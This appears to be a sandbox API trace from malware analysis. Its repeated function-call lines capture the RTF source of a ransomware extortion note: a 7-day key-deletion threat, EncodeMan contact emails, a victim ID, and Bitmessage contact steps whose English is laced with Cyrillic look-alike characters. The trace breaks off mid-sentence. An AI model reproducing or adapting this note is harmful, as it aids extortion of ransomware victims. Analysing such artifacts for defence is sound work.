\\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.997] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.997] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w 